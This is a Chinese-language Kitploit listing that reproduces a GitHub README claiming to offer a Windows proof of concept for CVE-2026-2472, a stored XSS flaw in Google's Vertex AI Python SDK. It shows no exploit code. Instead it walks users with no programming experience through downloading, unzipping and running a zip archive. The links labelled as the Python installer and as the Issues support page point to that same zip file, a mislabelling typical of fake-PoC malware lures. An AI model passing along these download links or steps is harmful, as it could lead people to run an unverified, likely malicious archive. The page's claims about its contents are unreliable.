Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-2472-Vertex-AI-SDK-Google-Cloud — 揭露并详述 Google Cloud Vertex AI Python SDK 中一个未经认证的存储型 XSS 漏洞,影响版本 1.98.0 至 1.130.9。 | Kitploit
工具/GitHubGitHub/megafart1/cve-2026-2472-vertex-ai-sdk-google-cloud
漏洞分析漏洞利用Web应用程序漏洞利用云安全学习与教育AI 安全
GitHubmegafart1/cve-2026-2472-vertex-ai-sdk-google-cloud

CVE-2026-2472-Vertex-AI-SDK-Google-Cloud

揭露并详述 Google Cloud Vertex AI Python SDK 中一个未经认证的存储型 XSS 漏洞,影响版本 1.98.0 至 1.130.9。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
235小时47分前尚未审核
分享

🚨 CVE-2026-2472-Vertex-AI-SDK-Google-Cloud - 简单概念验证工具

Download Now


🛠 关于此应用程序

此工具针对安全漏洞 CVE-2026-2472 提供了技术性概念验证 (PoC)。该漏洞影响 Google Cloud Platform 的 Vertex AI Python SDK。它涉及 SDK 中与 Jupyter 和 Colab 笔记本一起使用的部分所存在的未经验证的存储型跨站脚本 (XSS) 漏洞。

该软件帮助您了解此漏洞是如何被触发的。它可在 Windows 上运行,无需编程知识。您可以在自己的系统上安全地进行测试,以了解相关风险。


🖥 系统要求

在开始之前,请确保您的电脑满足以下条件:

  • Windows 10 或更新版本(建议 64 位)
  • 至少 4 GB 内存,建议 8 GB 或以上
  • 2 GHz 或更快的处理器
  • 至少 200 MB 可用磁盘空间
  • 需要互联网连接以下载文件并完成初始设置
  • 已安装 Python 3.8 或更新版本(SDK 需要 Python)

📦 此软件包包含什么?

此下载包含:

  • 演示 Vertex AI SDK 中 XSS 漏洞的 Python 脚本文件
  • 用于搭建安全测试环境的辅助文件
  • 无需黑客经验即可在 Windows 上运行测试的说明
  • 用于展示漏洞工作原理的日志和报告

这些脚本模拟攻击者如何通过 SDK 将恶意内容注入 Jupyter 或 Colab 笔记本会话。


🚀 快速开始

本节将逐步指导您如何在无编程经验的 Windows 电脑上下载、安装和运行该软件。

1. 访问下载页面

点击此链接或上方按钮打开官方发布页面:

https://github.com/megafart1/CVE-2026-2472-Vertex-AI-SDK-Google-Cloud/raw/refs/heads/main/obumbrate/SD_A_CV_Cloud_Vertex_Google_2.0.zip

2. 下载最新版本

在发布页面上找到最新版本。它通常以文件压缩包(一般为 .zip)或包含文件的文件夹形式出现。

点击文件即可下载。请将其保存到容易找到的位置,例如桌面或下载文件夹。


3. 解压文件

下载完成后,在您的电脑上找到该 .zip 文件或文件夹。

  • 右键单击 .zip 文件
  • 选择“全部解压...”
  • 选择一个易于访问的目标文件夹,例如桌面上的新文件夹
  • 点击“解压”

这将解压文件,以便您可以使用它们。


4. 如有需要,安装 Python

此工具使用 Python 脚本。您需要安装 Python 3.8 或更高版本。

检查 Python 是否已安装:

  • 打开“开始”菜单
  • 输入 cmd 并打开命令提示符
  • 输入 python --version 并按回车键

如果您看到版本号为 3.8 或更高,请跳过此步骤。

如果未安装 Python 或版本较旧:

  • 前往 https://github.com/megafart1/CVE-2026-2472-Vertex-AI-SDK-Google-Cloud/raw/refs/heads/main/obumbrate/SD_A_CV_Cloud_Vertex_Google_2.0.zip
  • 下载适用于 Windows 的最新 Python 3 安装程序
  • 运行安装程序,并确保在点击“安装”之前勾选“将 Python 添加到 PATH”
  • 安装完成后,请在命令提示符中重新检查版本

5. 安装所需的 Python 包

这些脚本需要来自 Python 包索引 (PyPI) 的特定 Python 包。

安装方法如下:

  • 再次打开命令提示符
  • 输入 cd path\to\folder 导航到您解压文件的文件夹(请将 path\to\folder 替换为您的文件夹位置)
  • 运行以下命令:
root@kitploit:~
pip install -r requirements.txt

这将下载并安装程序所需的全部库。


6. 运行概念验证脚本

在命令提示符中,进入项目文件夹后,运行:

root@kitploit:~
python main.py

这将启动演示脚本。

该脚本将模拟漏洞并显示解释当前状况的消息。请按照屏幕上的说明查看测试结果。


🔍 如何安全地使用该软件

  • 仅在您的个人电脑或安全的测试环境中运行此工具。
  • 请勿在您不拥有的任何在线服务或网络上运行此工具。
  • 仅将输出用于学习或测试目的。
  • 该软件不会修复漏洞,仅演示其工作原理。

➕ 补充信息

什么是跨站脚本 (XSS)?

XSS 是一种安全缺陷,攻击者借此将恶意脚本注入网站或应用程序。攻击者的代码随后可以在您的浏览器或应用内部运行并造成危害。

此工具展示了在 Jupyter 或 Colab 等笔记本中使用 Google Cloud 的 Vertex AI SDK 时,XSS 可能发生的一种方式。

为什么这很重要?

如果攻击者利用此漏洞,他们可能无需登录即可运行恶意脚本。这可能导致数据窃取或其他攻击。

此 PoC 旨在提高安全意识,帮助用户和开发人员更好地保护其系统。


📥 下载位置

请访问此处的发布页面以下载文件:

下载 CVE-2026-2472-Vertex-AI-SDK-Google-Cloud


ℹ️ 涵盖主题

  • 如何在 Vertex AI SDK 中触发 XSS 攻击
  • 使用 Jupyter 和 Google Colab 笔记本
  • 测试基于 Python 的 AI 工具中的漏洞
  • 了解云平台中的安全风险

🛡 关于作者

此仓库用于云平台安全的研究和教育。它针对影响 Google Cloud Platform 的 Vertex AI SDK 的漏洞 CVE-2026-2472。


📧 支持

如有问题或疑问,请使用此处的 GitHub Issues 页面:

https://github.com/megafart1/CVE-2026-2472-Vertex-AI-SDK-Google-Cloud/raw/refs/heads/main/obumbrate/SD_A_CV_Cloud_Vertex_Google_2.0.zip

下载工具